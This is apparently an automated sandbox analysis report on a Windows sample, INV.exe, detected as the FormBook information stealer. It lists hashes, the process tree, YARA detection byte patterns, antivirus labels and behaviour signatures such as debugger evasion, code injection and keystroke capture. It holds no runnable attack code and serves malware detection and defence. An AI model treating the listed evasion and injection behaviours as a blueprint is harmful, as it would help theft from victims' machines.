Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report INV.exe

Overview

General Information

Sample Name:INV.exe
Analysis ID:323458
MD5:83259cb82642666503278233421c306d
SHA1:180e81bab341eda0d404b8f5fed93bc3b350cfbd
SHA256:6e28207e7a3ef7f173d7a7905208a55ff0ad1eb645241e2e9ae453c643cf3a31
Tags:exe

Most interesting Screenshot:

Detection

FormBook
Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • INV.exe (PID: 7140 cmdline: 'C:\Users\user\Desktop\INV.exe' MD5: 83259CB82642666503278233421C306D)
    • conhost.exe (PID: 7148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • INV.exe (PID: 1740 cmdline: C:\Users\user\Desktop\INV.exe MD5: 83259CB82642666503278233421C306D)
    • INV.exe (PID: 6348 cmdline: C:\Users\user\Desktop\INV.exe MD5: 83259CB82642666503278233421C306D)
      • INV.exe (PID: 2856 cmdline: C:\Users\user\Desktop\INV.exe MD5: 83259CB82642666503278233421C306D)
        • WerFault.exe (PID: 1868 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 872 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x1e940:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x1ebba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x2a6dd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x2a1c9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x2a7df:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x2a957:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x1f5d2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x29444:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x202cb:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x3054f:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x31552:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x2d471:$sqlite3step: 68 34 1C 7B E1
    • 0x2d584:$sqlite3step: 68 34 1C 7B E1
    • 0x2d4a0:$sqlite3text: 68 38 2A 90 C5
    • 0x2d5c5:$sqlite3text: 68 38 2A 90 C5
    • 0x2d4b3:$sqlite3blob: 68 53 D8 7F 8C
    • 0x2d5db:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x21b10:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x21d8a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x2d8ad:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x2d399:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x2d9af:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x2db27:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x227a2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x2c614:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x2349b:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x3371f:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x34722:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 10 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.2.INV.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        4.2.INV.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x1ad40:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x1afba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x26add:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x265c9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x26bdf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x26d57:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x1b9d2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x25844:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x1c6cb:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x2c94f:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x2d952:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        4.2.INV.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x29871:$sqlite3step: 68 34 1C 7B E1
        • 0x29984:$sqlite3step: 68 34 1C 7B E1
        • 0x298a0:$sqlite3text: 68 38 2A 90 C5
        • 0x299c5:$sqlite3text: 68 38 2A 90 C5
        • 0x298b3:$sqlite3blob: 68 53 D8 7F 8C
        • 0x299db:$sqlite3blob: 68 53 D8 7F 8C
        4.2.INV.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.INV.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x1e940:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x1ebba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x2a6dd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x2a1c9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x2a7df:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x2a957:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x1f5d2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x29444:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x202cb:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x3054f:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x31552:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus / Scanner detection for submitted sampleShow sources
          Source: INV.exeAvira: detected
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.INV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: INV.exeJoe Sandbox ML: detected
          Source: 0.0.INV.exe.1060000.0.unpackAvira: Label: ADWARE/MultiPlug.Gen7
          Source: 4.0.INV.exe.1060000.0.unpackAvira: Label: ADWARE/MultiPlug.Gen7
          Source: 4.2.INV.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.INV.exe.1060000.0.unpackAvira: Label: ADWARE/MultiPlug.Gen7
          Source: 2.2.INV.exe.1060000.0.unpackAvira: Label: ADWARE/MultiPlug.Gen7
          Source: 3.2.INV.exe.1060000.0.unpackAvira: Label: TR/Crypt.EPACK.Gen2
          Source: 0.2.INV.exe.1060000.0.unpackAvira: Label: TR/Crypt.EPACK.Gen2
          Source: 4.2.INV.exe.1060000.1.unpackAvira: Label: ADWARE/MultiPlug.Gen7
          Source: 3.0.INV.exe.1060000.0.unpackAvira: Label: ADWARE/MultiPlug.Gen7
          Source: C:\Users\user\Desktop\INV.exeCode function: 4_2_00404A29 FindFirstFileExW,4_2_00404A29
          Source: C:\Users\user\Desktop\INV.exeCode function: 4x nop then pop ebx0_2_01099E2B
          Source: C:\Users\user\Desktop\INV.exeCode function: 4x nop then pop ebx3_2_01099E2B
          Source: WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication
          Source: WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o
          Source: WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005
          Source: WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid
          Source: WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200
          Source: WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/locality
          Source: WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/mobilephone
          Source: WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier
          Source: WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/otherphone
          Source: WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/postalcoderhttp://schemas.xmlsoap.org/ws/2005/
          Source: WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince
          Source: WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20
          Source: WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/thumbprintrhttp://schemas.xmlsoap.org/ws/2005/
          Source: WerFault.exe, 00000007.00000003.661457706.00000000051C0000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o
          Source: INV.exe, 00000000.00000002.648809427.00000000012C8000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 4.2.INV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.INV.exe.1060000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.INV.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.INV.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.INV.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.INV.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.INV.exe.1060000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.INV.exe.1060000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.INV.exe.1060000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.INV.exe.1060000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01061BC70_2_01061BC7
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_0109C16C0_2_0109C16C
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_0109C1700_2_0109C170
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010950B70_2_010950B7
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010950C00_2_010950C0
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_0106B0E60_2_0106B0E6
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010933600_2_01093360
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010743990_2_01074399
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010952E00_2_010952E0
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010715210_2_01071521
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_0108A57D0_2_0108A57D
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_0106B4FE0_2_0106B4FE
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010727AF0_2_010727AF
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_0106B9330_2_0106B933
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010759B40_2_010759B4
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_0106ABF20_2_0106ABF2
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01071A930_2_01071A93
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_010B0AC00_2_010B0AC0
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01073AD70_2_01073AD7
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01069D440_2_01069D44
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_0106BD680_2_0106BD68
          Source: C:\Users\user\Desktop\INV.exeCode function: 0_2_01070FB60_2_01070FB6
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_010715212_2_01071521
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_0106B9332_2_0106B933
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_01069D442_2_01069D44
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_0106BD682_2_0106BD68
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_010759B42_2_010759B4
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_0106B0E62_2_0106B0E6
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_0106B4FE2_2_0106B4FE
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_010743992_2_01074399
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_010727AF2_2_010727AF
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_01070FB62_2_01070FB6
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_01061BC72_2_01061BC7
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_0106ABF22_2_0106ABF2
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_01071A932_2_01071A93
          Source: C:\Users\user\Desktop\INV.exeCode function: 2_2_01073AD72_2_01073AD7
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01061BC73_2_01061BC7
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_0109C16C3_2_0109C16C
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_0109C1703_2_0109C170
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010950B73_2_010950B7
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010950C03_2_010950C0
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_0106B0E63_2_0106B0E6
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010933603_2_01093360
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010743993_2_01074399
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010952E03_2_010952E0
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010715213_2_01071521
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_0108A57D3_2_0108A57D
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_0106B4FE3_2_0106B4FE
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010727AF3_2_010727AF
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_0106B9333_2_0106B933
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010759B43_2_010759B4
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_0106ABF23_2_0106ABF2
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01071A933_2_01071A93
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_010B0AC03_2_010B0AC0
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01073AD73_2_01073AD7
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01069D443_2_01069D44
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_0106BD683_2_0106BD68
          Source: C:\Users\user\Desktop\INV.exeCode function: 3_2_01070FB63_2_01070FB6
          Source: C:\Users\user\Desktop\INV.exeCode function: 4_2_0040A2A54_2_0040A2A5
          Source: C:\Users\user\Desktop\INV.exeCode function: String function: 010821A8 appears 46 times
          Source: C:\Users\user\Desktop\INV.exeCode function: String function: 01085976 appears 36 times
          Source: C:\Users\user\Desktop\INV.exeCode function: String function: 010627F0 appears 90 times
          Source: C:\Users\user\Desktop\INV.exeCode function: String function: 010615FE appears 33 times
          Source: C:\Users\user\Desktop\INV.exeCode function: String function: 010632A1 appears 81 times
          Source: unknownProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2856 -s 872
          Source: INV.exe, 00000000.00000003.647727507.0000000002F0F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INV.exe
          Source: INV.exe, 00000003.00000003.649712453.00000000033FF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs INV.exe
          Source: INV.exe, 00000004.00000002.728297427.0000000004E00000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs INV.exe
          Source: INV.exe, 00000004.00000002.728240140.0000000004D90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs INV.exe
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: sfc.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: phoneinfo.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: ext-ms-win-xblauth-console-l1.dllJump to behavior
          Source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.726038979.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.726953085.0000000000BEA000.00000004.00000020.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.648648516.0000000001081000.00000004.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.654174864.0000000001081000.00000004.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.727594067.0000000003955000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.INV.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.INV.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.INV.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.INV.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.INV.exe.1060000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
